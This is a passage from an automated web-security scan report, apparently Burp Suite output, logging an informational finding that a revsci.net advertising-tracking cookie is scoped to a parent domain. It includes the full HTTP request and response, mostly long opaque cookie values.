M9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_uG1E="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9RC0SyMoveM9OR5om4StALLEl9sEMKhlHBzeU7ijPkBdccmYgL/cDxbkmGxcHDPUd6arpIXsBeeCz8RUihBraX7I4lUnumh2VZdVC6U+2Iyfb4lspwfQ0Qc20UfAysYwo0lmCDtV0l46H0o8imY6Ek5bK40OsChSF13EHS9L/JMO5yBK1sR1F6sPT5BCcDUJGiOoLEIC5jVV4VX9tBSPSZxMciu9BuydeRrnXnmX7xk9eoy5XTyakvC6iziP46mG09QttHI6EZm+gxfR2AsZG7NBY4c13BhUTe+ATGQ2jJSvrw0gmmWqR5fNCXvqYGSPiksoGeJAbVn/mO3tTGfDrI17vImZ8p8Fsg9VBh8zxBLukmDUmdO4IUsjbj15y2ct3flWq2lWaz871YXnRrejTM9iqgOpXT+qRrf9VnDGxXMRYoUec4Kt86uJaDOJIv2ZoEdYHdsYaDeoiwop8eZ3OfQgjTdvix4Ub4WFj9sYLt9DNE2/axuMn9I3SawSCHVbiIjkaJlzNEerKiLUuEhnDsq9OlsRV8MfsxSMpBUYfx/hXxG2dgK1oEUl3fBGCB2+NpfSodnMDPXRJlgbydlVcw2zqj3ZXpaOmGtdNLYMhcTbiZp9yaF+Oq27MBI6OI3dbqql2hh5QVtT1Vtl4zyIHF4CYqOdnUaNjVs99jQlm+Jl3ayb0jkw4FM7CLHjxxAaAsSSAJZXFHc9EPId8HJvJkCP8wPM83DNKQPfvnt19gZCOdXQfVZuy7m43BidVvY1XzwAVAsi2Jz/Xw0/57se/CteOysjXdhpJloWWRbSaHofPvaNn2QPb+F3nSUYs6QpevIWYM0EIBh4O/k1CW9hMm9O969MfrRB6KcsHSTGuLablUPatMr5CKDdC7dilqtsCPBbuemtY7/JRF0lB8ugjMR3TU29iuhQh4DM8dXU2eXESGkBEOnmBXjj+ykRDLnK43srYmiFmuSxGIMEtlV35EbebkR7RVTsFGdhbGw/UrDGoRaCJWKw9SEbtgSEbTqfrFDt39mx4CdEHY9Jl9wKnhW3LA7INQvxZ7Qdc0Kt4/s5Sisev8BhqtUORlQMRv36XWVkxSggr/1fOlKezfQECeUQcfAhDrtAQmN/KwRLguSPrMj/XnCquTkHp2RE+jy7gxI7A4xQ8HppKUDVC3BvFrgC8zy8jdL0OdypkNvMtNIlM+84TBY1pJgQVZwTt4Gccoz/3FGVM1bW6+scWwazoDxBh+pqlUu8hoPLroC8JI8bbJkPG81znwrEb3K243Jj/auGDuVMn5PABvBMqgB6xAfBgQDDbKnFrO5M30YbQ+u2lgp+h/sXI"; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG3UTjJLypNPMu8j89fd7oQaFd1yGE6gsBwU8BLTkNk43VN7eq0QNSl7qDARhQsHIutVu1KLfKMnApLMfGK0rX2a4suESz2iJdtYf9XH36phtyM/9lq1L56zCW6wi1OjQJnxO6Avik/yIfTcqDu+JM8zqIKUJ1/wIhfcRn2t1zZ/GPwqflRKv7mR+TJcv0TSV5Rune8VjEeJ5hQ71NNMFrxR4WvhNWyaW7FHWOcC6oMd7KuBSfNJ3cxwbuemPMD8pUP3WkcMovWv+TGEeHhG2/7YWZyY+XOMTrFf9MEMHFxJqZv9fNeZTG8ptA0vZ+hj8yM/2MzwuI1l5oQQFgxUuvL5LSyR2+NFa7BqDzjQdE6E1YTWlmAPl/smXvHSD1tAVxSrez6o4MyEj5N9wcTCMOX5jhR1hdognwanlV3Q7ao3TdXSXNlTfI01lDBEllhrXXVZ0JH7my5Yn+W1taRXxh7fmxpLo8oOhYuiu1gnMj3AgB/ZAlSpzkL2XizhuRHKq9+jiA+Yhx8CxujLYsOWyvK5k9f86hMhHRl1FJD/6WeFCMiFUp5j8U/dm8THod2HersTn/McYGbGinDXzhXokO/aXIt14z2SupxJWhBkHfP8ST8pIHs0Z6Z2x8kD71tuL47wbOsFLK4qDE/McPZQ5P9zRAMqAUjx3fg6q4imUphYisBILkFwnJ0ym3FiOjhVWOgbINcopH46sBRlN7AMRulZSIuXUrYDFiPtipA/Km3zEwB1s3Hwu8u218uLe9kbfohQ8gmvQdYeMI8IKcfAF1p1ulJQ1LWyi/A367NsXyMmyV19R6EJEhSt/+201gC9PkNPZpjmkDWOK/vtspMx6UA/CiP1s2wEOGHUjLEZYXCZ7OOlwF7WuMs+HlVnGJMCGlnVdNEcAZMc5QnWLBB0msmf7BhOWQvMRQBlCm3MwjQogVRMcOvuQmu57i1AV734gChEUH1RmDSz/DrTWPQwYCpHd8cQv+PvWyXoemp1fxok6dEsgd9HdWDlhRO5HH6E9BXjRGSbU9LdtiME/MNVDpaCv30bZKQG71xgFanOBzu/345w96H7k2oeOM4jQOmbAXIuSg3eS0F2fCC8U3aR0gwSTo46hlufcvXBF1sSUB9XqXpWqaykz3HXGTSisGqfVxXHeef/lyTVyOs6/D0e3Kr0NGnCjoPWM+I5C5NHgzwP73+emFRARuvGsOmcpTGJucX5KdQOiQOcoUgqapUQx9h1lVy1capdeiqiLeYvZCuv2r/zvQ/zH1tamJ4R3wFxyjmto3TWF7RPsbW6jq9uF0AWDWLZZQaj+C38PLCWUvGbODS0sjWOT1Kq5DuBxYT9CtUYK0sbFcYAUkPfyXM8lmXNF7Ccv7t4zGIsRsDuvR7R7boYs0/a70AKDkGaGBKdWgidh9dDHaH6Pc8IMbbiaDow+/jxTSH4RngJq00a1sh6HuNdGAAKnwhAYyY13Wil/LR+jBU43rCan1ttQYnFT+xeMeBBa1h9TdFL4eT+0vDAzD3/CAifJwuCSA/k8i+T5sdauhYtS75LOM2J0Qw8Kn3l+Gqf0XTi4EZqlhyagMnEMt60uy2z+wktSuZxnt4n9cEmWbvTyRDhnZaJFy59tGiaOfip3HCbgKRlimO/+ks0QdR1LebJUsLKHZ/c9QxKJtsZ0l08lMopve2psCRUJVsVH/qovl7znk03BUdt1bu5U/3ND43LiX25yi1RRMXQsvxFB53Facr4L3KD/TerWRH6Z1UNYYqbFc7uSEHGal19NT"; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8ew+HKYQN/HAJvUhm3rv4/LBE7cTVeEkhIJ3TjyZr9m6sq4Q+LrTJlL1uuQ6tCbi55Z1G4L77xaOwsBqv2iJeQrJPavHfv08iaittLGEZxUEdFXA5WZfs93Uva3xLP5ThZmTvo4fHv1sFElaVZMwQ8GPkKRHtqErQCd+a+JKleRc92rFT6wCDGeCebWg9kyOHYUlqzwc7Zx0ZFXv/oUdXx1+hQFP+RtkGUDynUy6CBi64g+YpZpC2pPFgE6FJQwfWNN8=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQX1dfcmxcf0Wvq23q+MT2iJYg/xrxzjNp79VYSobSVOD7WX/S9Z8O4BnUHBiqvRIkPnhSUmUe6IqBE7GhEwMzNJJcuu2seC5Iq2xH7Qywe+4DJyaRxTw/mss73j5pLn5ZanpEu8QCmuhtkv8oye8PJyXzHyFFqvQHvEUUW1Bd8WQ4/TVd06R1uszI4TYM73mqCpBDmxZhu+yUoLnATqy/tiKdn75egfCW6/fUTu+7FXa+mttDWsXOHscmzGcdcNnz1ng2pZ45YSn4RE/BtirGw5welW2A2Iz0fGzTVF72idj9hrLuiklOHPB6nyU9du/DMNNE=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:54:13 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:54:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.202. http://pix04.revsci.net/I10985/b3/0/3/1008211/870883424.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/870883424.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRRloHN3+orJACrVeeEz550D1q6YfT09jcb17LPDX8fRNzIxBY9d58s8KWjBNmXwVXJJ7UHisDFf9Ey7Ms7Wr2plDqEMX6bjjECP++dzpXLEjq+VGlvjNs1C2NYn//UK1d0sLFeGRAwP30BeDDG9nGG8OAncZJxK/3iMf/qG1fOQh11zX5a4KeTBQK17RFxsTNh2j2fKLpXHqWExgWzJQhuIp3yPqX/iP0Fdb1X0mccqxQ1tIULcMXty6FxRR2tEUdD/lOGzmw1dAxjKLqWZViDH+nw9VjH2eHWq1baas761ofPzSk/CbXGLKG0KjU+ETCo0d1J28pAv0u; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:14:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/870883424.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_es3R="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9XaU6g++2ZVjEpNZvXbTc7xC8rSTKo6Yk2BjeU7ig3joPvt9kFbQmtJgcth9D4tu4lE0okN4nBWWX49AnJCNbzybfVtVyr29ueolA+qxG0akBUj8teTvnm5RAGxmh8M+AJ0dedg7vq8bDxmzmdi6L3N854nH/8HPbp1FR1/eyEAfDoiiBUmuHa/Szy1DdFgCAbPZ/XCViJu/6hY7oZwn9fr8gVuK0FqMVKrXdoqdIrJrnZczYdR4dFWq8hd9AIgCNvqz0rpsHPJ75cGBTN6SSkBop8xg0bd+5v4M0F/u62KrbD0lp5aB08JiW2IA3qxZ49p9KCMk9g1JVIqszlij9AjTXf9zgHkU4QpK8IVTkZG61bhp3UC3I9eYleAZYe4SRXPEprQF8vQ7lMb2Lsul3I+yKPTzomV84MLKhWQLXSDWHrwgg3I39Os9hgOnh0GfCRwxe2ztQIsYDCZCb6ycYL8JSaOuKmoARjzq+jcB2AvgYmv7eLD6SUZqUEAP1v4Ae8hwqpqROsgD9JQqMvk6bmC2JWWoOayaN7A0DQgij5wGRZuZf7uuo40XNuyFUlaUiz0TJUEYEGakmplGfbGkin8aFBWkUH2+9av5bI1cjwKafta0fCdLNH2ljwOFKRgKQsdj5ftSFKyCVTkNLiyqej120IgTMaouMC8KMin288+YmZxeMwwDWrgkEvxuC4V5v83zx10ZMGVYeSt3ZubgtmL7r8t4th23Jwdr0ZMRybi83lcQeOOpdzUr84jGFIhMwn2oyJc/UPVhO/vYmuj+89OK6qJlork5TV7W9Kc7N4eOIFttBBk49jo3rE9AR2v5z1wu4bOfEzS2Pc0H+h8K1F3vU7Rgisw1DTpmLrmWjgOdR/TgH4v8njudUZdcc7fU0xMB8ejYxCRLY1Xh+brYYrT1jRbRR5YURhyF7JMvDephnZNDe4NmgtW4OGzSOL0BA+/3PJLeyhDrwNBe8Y0VdHp2gCMpyZorsTCwDC+vOH08k9TXRGxqE2dUMCYRw4Cl5pZeKQMn2HEpIDqQB1RIEBLKhZUrniMXjbfNnIotgm+1XsnRqSuO34lpI7KYqZBkRVcf0SYzFGDDcxF1FxtFesF0m8cvPoYic2G7iOWFsZvHdH/IVg5spFvbsguOFq/gWSla6xk6HnyuOznYoveakJxHRn+Cp5bE0+yyWXqqokRaO10wrRoss3f2Xoo2ngfUfws2NT65pTOqQi0q0l8Ja4SzgChM/SP/XXcmg/RsMp8n1ZbCLIrKKMRtY/9YVC2rlVEFm/rMaES68L0KO0bBQ4QuQiJOApaW8ceXZxnEIWd97ghtuWYrDTwxQ="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAxBCInYEZ/jMMNxtAxH0lsZ65lpt0Uj/e/FhI5M0TXHoXPqpzJ88AKdLvfI3vGiLV2a4suESz2iJdlSNkxSTqrWV9haIjspP5ypK/QvJIUOcP+dMn7aUihJ083h/5SP+5fLGxoN/Qieup8pylzfqyyuCCLe9zsrf3g1mwxBePFgQ+odbS+uZutX5E7jxOY99rxJ+WPsNVw8LBeTRziv1ZYDEUQhoToZrgn7ku70od0kC4kjJlohpuW/Av7SKUtW6l0plKeAVEc48XA5WtJJbNkD7paMqsldpZ8puMz81lhto2YwAsf9RSwLLUKiE2GqBwyqcexhb+JNa7IryqVaPjZ3eu4oyyh36+MmVvfS/0lYVzLjv7mLuGCpt6bte7k6oAK/ngtjd0sXYnwQs7e2pZ83LgLV2vkBJS06XVJE2ge/mMAqc5CSelfiVItvKGzS7wd2sKDJq/DetlEA9LI/jC9ln7V5pH9JId/ln/LwwwaYhbEWiqL4Qt031EWoZVA75Y4besYqP9HVeq4pD24e5+pvz65FAkkTVQSAEfOMzzTQuZMePijcWytF5N+xA8wjnH08HT+ufEN/7is8rc9S2VyT4Z/8cTk0WeZetbqGoMoPQx65LTfHoi+dp8msYoazvcpiwzOXgtW6iaWcXwDJmPhQCZIVwIh+809uQV/6YAmQoWZQ31tyMDuyF2Jl874et1VsWh+ZQEmLGJPgi9Sby4K3Q2wmNhABAWGV8QjiLkE4AA2xxdy1rye+OV2IUivmJ0y0hAsMSe31MOmAYive+p2VTxMr61OBelwZA8B1ByJW3AECt8Lq41YR433M2skqZB7Bscl4IeGnZ58uYN3pd79XDsOgUGGHEKgc+7Yhj3b17xVZX/G3DAFa1giw37vGJFFjvDiFiOhohn4BP5D3Lbe5u1/EMfom/qiH9of7vAudveq4lfPlJzDXu+DiQwwzHEv+wUPaxw3GKnLvQFwh1xC3xbWl+Har/mizye4bMAK/OltQjqwZwXf+c3piPfyL9HQI4A7FO7oqBogV6RjXrWd01tXkImPIoNEqzJAiSOu2pB46enweqy14lHKPZCsIym+R6FwlYjbYsS6gnUJBcAia1xyB+Z+4xZRKusmtZnU8SyFQDgMyO4soMT+tqZspzllxZFj3bLYE+1j2rGaK1cwsZTezBW+FVaecyG+r7fTaCJhToBYKh1cxxOzelaaiUNZyOW2QQoVc2ogojiCJyXUaWT4FJN621g8J+ogiAX+K8V1mVKNJ3FdgrF9mlrS7rb+j7yXetXD9Q2Ryr2GcMptsaHTqdko18aip0oiC9Tg+ZE4UbOpRFRIAo8rHCwNATlXclUC3bYUNiIrovxdnOVMTq0S32n2R5dXcfp+IieM52iJDzoPe0oAbhGxhdO7Rf8E3AfCfjiKYGKIaxye4DlsqJ/1xGqWHveSgpxWfHLTNWQ/twJn2KuUPG3RsqO8EjbmDynIpuhtLaZPGDXV9xcEZMuoTYtWzAtZELONTTtosP4BznxD0dQWLtjaNBrJeyTdzwru1l96zuvlGb/XpbpQGNZfsMfG+CfYA0WLBLKAsCUlQ459jCppWYBLZERbEoHnF+C76FSeuefxgtzT1PPF3Lvcq6OoVfkIZiPdd8XvQoXZtqaPm6LgDUh6itIgjMafsHk57znC1ZjrPtK02xG1J+YzG/rU06izeAKFmydTpiUmuNMBORSipNbBblTmmWBKMJ0mOO1aejmyHqg2J7Dog=="; 